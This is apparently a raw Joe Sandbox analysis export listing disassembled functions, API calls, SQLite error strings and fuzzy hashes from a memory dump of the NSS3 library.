                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca92572b08e34852257b34e552402681c99da7b5d6d1d587e0a82df3bd56cd4f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D61A1B5E01345DFEB00DFE5D881BAABBB4AF14348F244128E819AF741E771E946CB61
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE10
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE24
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,6CE8D079,00000000,00000001), ref: 6CEAAE5A
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE6F
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(85145F8B,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAE7F
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEB1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEC9
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAEF1
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(6CE8CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?), ref: 6CEAAF0B
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CE8CDBB,?,6CE8D079,00000000,00000001), ref: 6CEAAF30
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: bbf09b1940b66a3dbdf1c1191b547ae28d027290368975c3952383c36c4ef226
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f759c2b6f1ca23679685e65c5e4e135b58854619586992134163fd4d83ec5fc1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf09b1940b66a3dbdf1c1191b547ae28d027290368975c3952383c36c4ef226
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A51BEB5A40702AFDB44DF65D885B66B7B4BF09318F248264E8189BB01E731F8A5CFD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE8AB7F,?,00000000,?), ref: 6CE84CB4
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6CE8AB7F,?,00000000,?), ref: 6CE84CC8
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6CE8AB7F,?,00000000,?), ref: 6CE84CE0
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6CE8AB7F,?,00000000,?), ref: 6CE84CF4
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?,?,6CE8AB7F,?,00000000,?), ref: 6CE84D03
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,?), ref: 6CE84D10
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,00000000,?), ref: 6CE84D26
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DC6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF29DED
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CE84D98
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CE84DDA
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CE84E02
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3bef321f3abe17e27ea34bac9ea44ff9c8c477e4eab70913118f2b5d9e144fdd
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3ebfe03e505863558eb6c923d9bc9afaf42681c19d0c287192cce039f4706a2e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bef321f3abe17e27ea34bac9ea44ff9c8c477e4eab70913118f2b5d9e144fdd
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F441A5B6E012059BEB11AF68EC50A6A77BCFF0521CF254175EC0887B52FB31E924C7A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE6BFFB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6CE6C015
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6CE6C032
                                                                                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6CE6C04D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CEB6A47
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6CEB6A64
                                                                                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6CE6C064
                                                                                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6CE6C07B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6CE67310), ref: 6CE689B8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6CE67310), ref: 6CE689E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6CE68A00
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68980: CERT_CopyRDN.NSS3(00000004,00000000,6CE67310,?,?,00000004,?), ref: 6CE68A1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE68980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6CE68A74
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE61D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6CE6C097,00000000,000000B0,?), ref: 6CE61D2C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE61D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6CE6C09B,00000000,00000000,00000000,?,6CE6C097,00000000,000000B0,?), ref: 6CE61D3F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE61D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6CE6C087,00000000,000000B0,?), ref: 6CE61D54
                                                                                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6CE6C0AD
                                                                                                                                                                                                                                                                                                                      • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6CE6C0C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE72DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6CE6C0D2,6CE6C0CE,00000000,-000000D4,?), ref: 6CE72DF5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE72DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6CE6C0CE,00000000,-000000D4,?), ref: 6CE72E27
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE6C0D6
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6C0E3
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3955726912-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                                                                                      • Instruction ID: abaf0b01f733c0f776f550c1707aa5b831cade893f5e4f3d0125c60f8bb0f9a1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00217FA669020566FB005A62AD82FFB327C9B4175CF284038ED18DAB46FB26D5198372
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE62CDA,?,00000000), ref: 6CE62E1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE69003,?), ref: 6CEBFD91
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD80: PORT_Alloc_Util.NSS3(A4686CEC,?), ref: 6CEBFDA2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CEC,?,?), ref: 6CEBFDC4
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6CE62E33
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD80: free.MOZGLUE(00000000,?,?), ref: 6CEBFDD1
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE62E4E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE62E5E
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6CE62E71
                                                                                                                                                                                                                                                                                                                      • PL_HashTableRemove.NSS3(?), ref: 6CE62E84
                                                                                                                                                                                                                                                                                                                      • PL_HashTableAdd.NSS3(?,00000000), ref: 6CE62E96
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE62EA9
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE62EB6
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE62EC5
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5b0c74894fa06cdbd917c72737910ed7e8dc0a6e98c61792733f684e245e9cf1
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 996422e6d5bffab366f3d781958fa9c717cce3861396b2eb1d662482dee05e7d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b0c74894fa06cdbd917c72737910ed7e8dc0a6e98c61792733f684e245e9cf1
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC21F576F90101A7EF021B29EC09B9B3B78EB5235DF240435ED1896B12F733D668D6A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6CE4FD18
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6CE4FD5F
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CE4FD89
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CE4FD99
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CE4FE3C
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CE4FEE3
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CE4FEEE
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                                                                      • String ID: simple
                                                                                                                                                                                                                                                                                                                      • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7b38c7f426aeb8b51ba49fe58ce72743926d96008c8979818f5643c8a4d88a5a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2b8ad029fe615f6bd04074ae8abea02586b7ee5bd1373a8d546c536f616532fa
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b38c7f426aeb8b51ba49fe58ce72743926d96008c8979818f5643c8a4d88a5a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F9170B0A012058FDB04CF55D880BAAB7B1FF89718F35C169DC199BB52D739E801CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CE55EC9
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE55EED
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CE55EE0
                                                                                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6CE55EC3
                                                                                                                                                                                                                                                                                                                      • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CE55E64
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE55ED1
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CE55EDB
                                                                                                                                                                                                                                                                                                                      • invalid, xrefs: 6CE55EBE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                                                                      • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                                                                      • Opcode ID: de3534ad792c0240e5ab829ab2e50471a296c17414a1cdd2731a4a85b00a13cb
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 74874ed33672ea5e99f9212f0368cb63e3becb60c1687a4fdf785199287ec75c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de3534ad792c0240e5ab829ab2e50471a296c17414a1cdd2731a4a85b00a13cb
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5981B032B076119BEB198F65C848B6A7770BF4230CFB9026DD8155BB51D733E862CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE3DDF9
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE3DE68
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE3DE97
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CE3DEB6
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE3DF78
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 25736c7886e72c0da4a41dddeb0b128c85020b6e52a2794b2a5359d3f88b6cb0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f8a219b2f665647cefc6befb0fba92c606c6f566caa79385361bb2e8c4b3a3d9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25736c7886e72c0da4a41dddeb0b128c85020b6e52a2794b2a5359d3f88b6cb0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB81F1756143109FD715CF25C880B6A77F1AF85308F24992DE88E8BB91E731FA46CB52
                                                                                                                                                                                                                                                                                                                      APIs
